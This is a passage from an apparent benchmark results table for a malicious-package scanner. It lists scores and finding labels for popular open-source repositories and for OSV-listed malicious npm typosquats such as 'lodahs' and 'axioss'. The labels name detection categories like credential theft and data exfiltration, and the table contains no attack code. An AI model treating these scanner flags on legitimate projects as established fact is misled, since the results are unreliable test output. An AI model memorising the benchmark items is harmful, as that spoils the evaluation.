handling","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:0ffca52988c432109773a57e23c338551b9c51b8","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","0","0.3.0","","2026.07.12.003","" +"reference-fixture-placeholder-secret-v1","reference-fixture","reference-clean","Regression control for documented placeholder configuration","https://github.com/9valleb9/SPY-Options-Dashboard","fixture-v1:d55f3f65c602eb1f695a587f61db7d635bfa1ad7","","","low","completed","true","true","true","low","0.05","true","HARDCODED_API_KEY","low","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"reference-fixture-flask-debug-v1","reference-fixture","reference-clean","Regression control: deployment warning must not be labeled a backdoor","https://github.com/9valleb9/SPY-Options-Dashboard","fixture-v1:18c530bc5c541ea2a330c43493279fc8e9686e26","","","low","completed","true","true","true","low","0.05","true","INSECURE_CONFIGURATION","low","high","","1","0","false","1","0.3.0","","2026.07.12.003","" +"reference-fixture-detector-regex-v1","reference-fixture","reference-clean","Regression control for security tools containing inert detector regexes","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:977043432c1a3f3ec5c5914bcdbb96c33c6e8995","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","0","0.3.0","","2026.07.12.003","" +"reference-fixture-event-stream-safe-version-v1","reference-fixture","reference-clean","Version-bound negative control for the compromised event-stream 3.3.6 incident","https://github.com/dominictarr/event-stream","package:event-stream@4.0.1:4989205f2c15c653baf5fd41bbacb8a7f6d55bad","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","0","0.3.0","","2026.07.12.003","" +"reference-express","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/expressjs/express","ae6dd37680e3a00618d6c8a3e522f0ee4eeba1a4","","","low","completed","true","true","true","low","0","true","","","","","151","62","false","4066","0.3.0","","2026.07.12.003","" +"reference-fastify","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/fastify/fastify","de3752df84bb8dd35a8226bb467f05862f4da57c","","","low","completed","true","true","true","low","0.075","true","OBF_BASE64_HEAVY | DATA_EXFILTRATION","medium | medium","low | low","","200","193","false","3701","0.3.0","","2026.07.12.003","" +"reference-koa","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/koajs/koa","52d5e8ff5ac79f2479463b53df2999900ae95115","","","low","completed","true","true","true","low","0","true","","","","","84","27","false","2878","0.3.0","","2026.07.12.003","" +"reference-axios","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/axios/axios","3ebc76240c835a07fc6af23cb10d41579371a08f","","","low","completed","true","true","true","low","0.165","true","EXFIL_COOKIE | DATA_EXFILTRATION | NETWORK_COMMUNICATION","medium | medium | medium","medium | low | low","","200","254","false","3433","0.3.0","","2026.07.12.003","" +"reference-lodash","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/lodash/lodash","a666ba591064c8011988275790ad7d625279f09c","","","low","completed","true","true","true","low","0.2025","true","OBF_HEX_STRINGS | EXFIL_COOKIE | OBF_BASE64_HEAVY | OBF_EVAL | OBF_NEW_FUNCTION | OBFUSCATED_CODE | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | medium | low | low | low | low | low | low | low | low | low | low | low","","63","97","false","6133","0.3.0","","2026.07.12.003","" +"reference-chalk","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/chalk/chalk","aa06bb5ac3f14df9fda8cfb54274dfc165ddfdef","","","low","completed","true","true","true","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","21","13","false","3006","0.3.0","","2026.07.12.003","" +"reference-uuid","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/uuidjs/uuid","ea83515d6a4de13a8f9d253fe772752c9dd7bbbe","","","low","completed","true","true","true","low","0.09","true","SUSPICIOUS_FILE_ACCESS","medium","medium","","100","34","false","4427","0.3.0","","2026.07.12.003","" +"reference-node-fetch","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/node-fetch/node-fetch","8b3320d2a7c07bce4afc6b2bf6c3bbddda85b01f","","","low","completed","true","true","true","low","0","true","","","","","27","26","false","2169","0.3.0","","2026.07.12.003","" +"reference-react","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/facebook/react","c0c39a6b3907eaab35f43074949e2957a2a734c1","","","low","completed","true","true","true","low","0.0375","true","NETWORK_COMMUNICATION","medium","low","","200","7070","false","6000","0.3.0","","2026.07.12.003","" +"reference-vue","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vuejs/core","9e03beb6b4c85a9d5b49b731c08263aa648e2a2a","","","low","completed","true","true","true","low","0.0375","true","OBF_NEW_FUNCTION","medium | medium | medium","low | low | low","","200","503","false","3829","0.3.0","","2026.07.12.003","" +"reference-svelte","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/sveltejs/svelte","b4d1583ae20f3869a88a731d9a265c546c099f66","","","low","completed","true","true","true","low","0","true","","","","","200","8765","false","3898","0.3.0","","2026.07.12.003","" +"reference-vite","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vitejs/vite","fef682d3f067d534a559faf6fd9baedda2e9f8f1","","","low","completed","true","true","true","low","0","true","","","","","200","2513","false","3743","0.3.0","","2026.07.12.003","" +"reference-next","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vercel/next.js","93249ee06d6e0c105b1278412768c8e0816d9936","","","low","completed","true","true","true","low","0.27","true","OBF_BASE64_HEAVY | OBF_EVAL | OBFUSCATED_CODE | EXFIL_COOKIE | SUSPICIOUS_FILE_ACCESS | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | medium | medium | low | low | medium | medium | low | low | medium | low | medium | low | medium | low | medium | medium | medium | medium | low | low","","200","29628","false","10970","0.3.0","","2026.07.12.003","" +"reference-nest","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/nestjs/nest","f2938487c45db149964a8b0efc58a073610dcdf1","","","low","completed","true","true","true","low","0","true","","","","","200","1928","false","3382","0.3.0","","2026.07.12.003","" +"noisy-vscode","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/microsoft/vscode","af2c64423e7ee5d1030a000c82a0bb774d043351","","","low","completed","true","true","true","low","0.2625","true","OBF_BASE64_HEAVY | CREDENTIAL_THEFT | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | high | medium | medium | medium | medium | medium | medium","low | medium | low | low | low | low | low | low","Manual review required; this result is not yet classified as a false positive.","200","16247","false","7152","0.3.0","","2026.07.12.003","" +"noisy-playwright","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/microsoft/playwright","2670e5cae0239502d053e530da2c675e5aa536aa","","","low","completed","true","true","true","low","0.11249999999999999","true","OBF_BASE64_HEAVY | OBFUSCATED_CODE | OBF_EVAL | DATA_EXFILTRATION | NETWORK_COMMUNICATION","medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | low | low | low","","200","3047","false","4826","0.3.0","","2026.07.12.003","" +"noisy-cypress","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/cypress-io/cypress","cd8bb88f1080d0ee354e605fadba986b03320828","","","low","completed","true","true","true","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","200","6980","false","4879","0.3.0","","2026.07.12.003","" +"noisy-electron","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/electron/electron","8215b5aa536ec6ae121003bc618bdd825bdbbb0f","","","low","completed","true","true","true","low","0.0375","true","DATA_EXFILTRATION","medium | medium | medium","low | low | low","","200","2849","false","3713","0.3.0","","2026.07.12.003","" +"noisy-esbuild","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/evanw/esbuild","6ff1d8b0d8c134e867a397eef39702a223ebef9e","","","low","completed","true","true","true","low","0.1275","true","SUSPICIOUS_FILE_ACCESS | DATA_EXFILTRATION","medium | medium","medium | low","","200","149","false","6114","0.3.0","","2026.07.12.003","" +"noisy-node","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/nodejs/node","1314579f8c82ed70b8cbe736fdea1df48624c285","","","low","completed","true","true","true","low","0","true","","","","","200","49533","false","5951","0.3.0","","2026.07.12.003","" +"reference-hapijs-hapi","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/hapijs/hapi","d4f93d80e6acadb0000f1cf67f9b1b5992e8a8cc","","","low","completed","true","true","true","low","0","true","","","","","62","12","false","3599","0.3.0","","2026.07.12.003","" +"reference-reduxjs-redux","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/reduxjs/redux","5d65348e26635b6ec627b1030732ed38797e88e9","","","low","completed","true","true","true","low","0.1875","true","NETWORK_URL_SHORTENER | DATA_EXFILTRATION","medium | medium | medium | medium | medium","high | high | low | low | low","","200","276","false","6740","0.3.0","","2026.07.12.003","" +"reference-reduxjs-redux-toolkit","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/reduxjs/redux-toolkit","7b269256424e1d44baf83d7de634d9f53931dda7","","","low","completed","true","true","true","low","0","true","","","","","200","952","false","3228","0.3.0","","2026.07.12.003","" +"reference-immerjs-immer","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/immerjs/immer","60ca295e1185db80322ef55ec3fb8475cbc960c7","","","low","completed","true","true","true","low","0.15","true","NETWORK_URL_SHORTENER","medium","high","","60","105","false","3170","0.3.0","","2026.07.12.003","" +"reference-date-fns-date-fns","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/date-fns/date-fns","4098115cf705e3af7f663d8e5b0686e39a9f478a","","","low","completed","true","true","true","low","0.1275","true","OBF_EVAL | SUSPICIOUS_FILE_ACCESS","medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | medium","","200","1703","false","3383","0.3.0","","2026.07.12.003","" +"reference-ramda-ramda","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/ramda/ramda","bcb320e60b5d91c958a6b02feb0bd8658d744298","","","low","completed","true","true","true","low","0.09","true","OBFUSCATED_CODE","medium","medium","","200","513","false","3894","0.3.0","","2026.07.12.003","" +"reference-sindresorhus-got","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/sindresorhus/got","e3924aa1e53a6ca3eb93a43618ce532442a89b40","","","low","completed","true","true","true","low","0","true","","","","","87","40","false","2841","0.3.0","","2026.07.12.003","" +"reference-socketio-socket-io","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/socketio/socket.io","d2d753fed4435015c2d83fe62e676b44e07fa3f7","","","low","completed","true","true","true","low","0.27749999999999997","true","NETWORK_URL_SHORTENER | BACKDOOR_HARDCODED_AUTH | HARDCODED_SECRETS","medium | medium | medium | medium | medium","high | high | low | low | medium","","200","655","false","4590","0.3.0","","2026.07.12.003","" +"reference-apollographql-apollo-client","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/apollographql/apollo-client","c843c98a803d7d7f48f4da72080a61d9086dc8ad","","","low","completed","true","true","true","low","0","true","","","","","200","853","false","4233","0.3.0","","2026.07.12.003","" +"reference-tanstack-query","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/TanStack/query","79d2384db5c8776680d5bfbe9b595618c066248b","","","low","completed","true","true","true","low","0.15","true","HARDCODED_API_KEY","high","medium","Manual review required; this result is not yet classified as a false positive.","200","2151","false","2775","0.3.0","","2026.07.12.003","" +"reference-testing-library-react-testing-library","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/testing-library/react-testing-library","be9d81d91314c9f0bafaa363f70b409b4b31989c","","","low","completed","true","true","true","low","0","true","","","","","36","31","false","3410","0.3.0","","2026.07.12.003","" +"reference-prisma-prisma","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/prisma/prisma","cda80a4488b7b551c36bf09ca2e8303ef9509da4","","","low","completed","true","true","true","low","0.27749999999999997","true","TYPOSQUAT_PACKAGE | OBF_EVAL | HARDCODED_DB_CONNECTION","medium | medium | medium","unspecified | low | medium","","200","4471","false","4192","0.3.0","","2026.07.12.003","" +"reference-tailwindlabs-tailwindcss","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/tailwindlabs/tailwindcss","35a3e9c5159bea77af0d48f0c8849279211cc7e9","","","low","completed","true","true","true","low","0","true","","","","","200","341","false","3223","0.3.0","","2026.07.12.003","" +"reference-prettier-prettier","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/prettier/prettier","41a8b99bb8d7d68c00d90d5b8fbaed20511d4cfd","","","low","completed","true","true","true","low","0.0375","true","OBF_NEW_FUNCTION","medium | medium | medium","low | low | low","","200","9125","false","3380","0.3.0","","2026.07.12.003","" +"reference-eslint-eslint","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/eslint/eslint","c5963f74bfa82a5b7ccc0607dcdcc695b8c97a31","","","low","completed","true","true","true","low","0.0375","true","DATA_EXFILTRATION","medium","low","","200","2156","false","3651","0.3.0","","2026.07.12.003","" +"reference-pnpm-pnpm","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/pnpm/pnpm","0dd21df7457d2026f411f2c1a09104280b9b16e5","","","low","completed","true","true","true","low","0.09","true","HARDCODED_SECRETS","medium","medium","","200","4869","false","4244","0.3.0","","2026.07.12.003","" +"noisy-denoland-deno","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/denoland/deno","e5aed78415ded1213794bbf1ebbde1bf5cfa08b4","","","low","completed","true","true","true","low","0.2175","true","OBFUSCATED_CODE | OBF_BASE64_HEAVY | OBF_EVAL | HARDCODED_SECRETS | NETWORK_COMMUNICATION | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium","medium | low | low | low | medium | medium | low | low | low","","200","14300","false","8022","0.3.0","","2026.07.12.003","" +"noisy-oven-sh-bun","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/oven-sh/bun","8f1a9540fdff25410506de76e0da2506d260c08f","","","low","completed","true","true","true","low","0.18","true","OBFUSCATED_CODE | OBF_EVAL | HARDCODED_SECRETS | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium","medium | low | medium | low","","200","17929","false","5830","0.3.0","","2026.07.12.003","" +"noisy-tauri-apps-tauri","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/tauri-apps/tauri","f5347cd70838c027040acb4a66733a2470f20ae4","","","low","completed","true","true","true","low","0.2175","true","OBFUSCATED_CODE | SUSPICIOUS_FILE_ACCESS | HARDCODED_SECRETS","medium | medium | medium | medium","low | medium | medium | medium","","133","948","false","3181","0.3.0","","2026.07.12.003","" +"noisy-puppeteer-puppeteer","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/puppeteer/puppeteer","5f5f931a0f2bc64bfb30039c507d763ce044c263","","","low","completed","true","true","true","low","0.1275","true","OBF_EVAL | EXFIL_CLIPBOARD | OBF_SETTIMEOUT_STRING","medium | medium | medium | medium | medium","low | low | medium | low | low","","200","2016","false","3726","0.3.0","","2026.07.12.003","" +"noisy-microsoft-typescript","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/microsoft/TypeScript","637d5746b70257028fb95aad32ddec6b26ab0a14","","","low","completed","true","true","true","low","0.075","true","OBF_BASE64_HEAVY | OBFUSCATED_CODE | OBF_EVAL | OBF_NEW_FUNCTION | NETWORK_COMMUNICATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | low | low | low | low | low | low | low | low | low | low | low","","200","53109","true","9514","0.3.0","","2026.07.12.003","" +"noisy-npm-cli","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/npm/cli","7b1f6c173d17b3bf30e45426f6df39473c6a1163","","","low","completed","true","true","true","low","0.09","true","HARDCODED_SECRETS","medium | medium | medium","medium | medium | medium","","200","6701","false","4126","0.3.0","","2026.07.12.003","" +"noisy-homebrew-brew","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/Homebrew/brew","76ca8d74e4a180badad438bf245ddfc740d68a8e","","","low","completed","true","true","true","low","0.09","true","SUSPICIOUS_FILE_ACCESS","medium","medium","","200","2970","false","3564","0.3.0","","2026.07.12.003","" +"noisy-python-cpython","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/python/cpython","1fece4457032382947c7c2a5c9e95dc106ca7a7d","","","low","completed","true","true","true","low","0.165","true","OBF_BASE64_HEAVY | OBF_NEW_FUNCTION | OBFUSCATED_CODE | OBF_HEX_STRINGS | DATA_EXFILTRATION | NETWORK_COMMUNICATION | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | medium | low | low | low | low | low | low | low | low | low","","200","5803","false","10282","0.3.0","","2026.07.12.003","" +"noisy-django-django","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/django/django","bdbda29c3e126754c3ae04ceb5c5d35d49aae01c","","","low","completed","true","true","true","low","0","true","","","","","200","6874","false","3997","0.3.0","","2026.07.12.003","" +"noisy-ansible-ansible","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/ansible/ansible","8d63341579aa1c62024f3bce1a8af3f9a1b22a16","","","low","completed","true","true","true","low","0.1275","true","NETWORK_COMMUNICATION | HARDCODED_SECRETS","medium | medium","low | medium","","200","5591","false","4048","0.3.0","","2026.07.12.003","" +"noisy-scrapy-scrapy","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/scrapy/scrapy","c9446931a80e63ea1d77e130ea5581b547e0f51b","","","low","completed","true","true","true","low","0","true","","","","","200","432","false","3222","0.3.0","","2026.07.12.003","" +"noisy-pallets-flask","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/pallets/flask","36e4a824f340fdee7ed50937ba8e7f6bc7d17f81","","","low","completed","true","true","true","low","0","true","","","","","107","129","false","2986","0.3.0","","2026.07.12.003","" +"noisy-rust-lang-rust","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/rust-lang/rust","5503df87342a73d0c29126a7e08dc9c1255c46ad","","","low","completed","true","true","true","low","0.2025","true","OBF_BASE64_HEAVY | SUSPICIOUS_FILE_ACCESS | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | medium | medium | low | medium | medium | medium | low | low | low","","200","60050","true","7390","0.3.0","","2026.07.12.003","" +"noisy-golang-go","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/golang/go","03845e30f7b73d1703bd8c21017297f6eecb76d6","","","low","completed","true","true","true","low","0","true","","","","","200","15414","false","5058","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2024-8862","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-8862; report blob cebceb18d12edabb3bf055a6936a367b0614e792","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/bcrypts-js/MAL-2024-8862.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:cebceb18d12edabb3bf055a6936a367b0614e792:7c7ee68d6f6b26b48726c11558dc9206bf998cf9","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2024-1377","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-1377; report blob c78863fed3a5a3b662b72b05c16b77d9dc153665","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/cors-parser/MAL-2024-1377.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:c78863fed3a5a3b662b72b05c16b77d9dc153665:3e4eb5c422572ea85c1fff43d7e1f202899068b3","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY","critical","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-19413","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-19413; report blob 84b9fce13d64dd7ec790910850e9fbbbf58cf348","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/electorn/MAL-2025-19413.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:84b9fce13d64dd7ec790910850e9fbbbf58cf348:d511c4332bf47892ca7bf08a3ad5e06ccc7224fb","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","1","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-20690","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-20690; report blob 2fdd79a99598980c7c4cbaad70833538b602a95c","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/flatmap-stream/MAL-2025-20690.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:2fdd79a99598980c7c4cbaad70833538b602a95c:faa25eec2f63ebf17e74b3d3dad492afa2bdc214","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY","critical","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-25502","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-25502; report blob 67e0222164b6b5f6ec72ce58d7a20b430cac4dd2","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/lodahs/MAL-2025-25502.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:67e0222164b6b5f6ec72ce58d7a20b430cac4dd2:5ee45d530dcca44dea28a23994dbcdbecfc63f8e","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY | TYPOSQUAT_PACKAGE","high | medium","high | unspecified","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-4275","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-4275; report blob 238dc228cd9cf54efea67c07f9bc7089b15207b4","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios.js/MAL-2025-4275.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:238dc228cd9cf54efea67c07f9bc7089b15207b4:e015c3138480f5286955833abfb3bea47471688d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2026-4493","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-4493; report blob 366383ef9f8518dfc534b911251a2dbe5ccd3928","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axiosqqq/MAL-2026-4493.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:366383ef9f8518dfc534b911251a2dbe5ccd3928:bb3d39dbc3518a28407d264f2abcf070c3a3657b","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15242","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15242; report blob 5850d1f4f2806fd59eb535b3e4d45beb058bc826","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axioss/MAL-2025-15242.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:5850d1f4f2806fd59eb535b3e4d45beb058bc826:81363d511fb327ca5616ccfcba7c5393e1a0044c","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY | TYPOSQUAT_PACKAGE","high | medium","high | unspecified","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15281","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15281; report blob e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-laoder/MAL-2025-15281.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472:7ae13db475be04ecc7d2b6fcef3b20c40bbc2e03","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15282","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15282; report blob b23f507de17d8c239290fb1c36a5d9a6d886b92c","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loadre/MAL-2025-15282.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b23f507de17d8c239290fb1c36a5d9a6d886b92c:cb4b464cf4c2449f6ad3903bd3e62fbe9c7579dd","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15283","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15283; report blob a98eafc3406e034fe14c4e2fe25edc21ee7e9a47","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loqder/MAL-2025-15283.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:a98eafc3406e034fe14c4e2fe25edc21ee7e9a47:b2eee8c6fb943b5b47deffd77c116865d4d2ddee","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15286","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15286; report blob 7d72739e67fda4b48cc77bfcb6c868feafd17567","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-node/MAL-2025-15286.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:7d72739e67fda4b48cc77bfcb6c868feafd17567:9b2980f27303a4070b0e103b0621839940ee9724","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15289","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15289; report blob 283dd8d75b91d4a35c89707bd10115e3d2ff9c69","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-pal/MAL-2025-15289.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:283dd8d75b91d4a35c89707bd10115e3d2ff9c69:55744bedf6294386bdc1eec2313e9b485a77322f","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15238","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15238; report blob aceadeea25bc4b32b766096204db12a15315e090","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-http/MAL-2025-15238.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:aceadeea25bc4b32b766096204db12a15315e090:30af885d0884dd6cec7fdbfb7ba0a3248110b517","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2023-116","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2023-116; report blob 0d58b457e7175cc230bff6d7b6da40d3781a5466","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-proxy/MAL-2023-116.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:0d58b457e7175cc230bff6d7b6da40d3781a5466:216fcbc2c9356dbccfd103971f088bcb84682b06","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-4813","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-4813; report blob bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-browserify/MAL-2025-4813.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392:2bae461ccd66abc5ecc0082b8681a81c125302b6","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-190832","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-190832; report blob 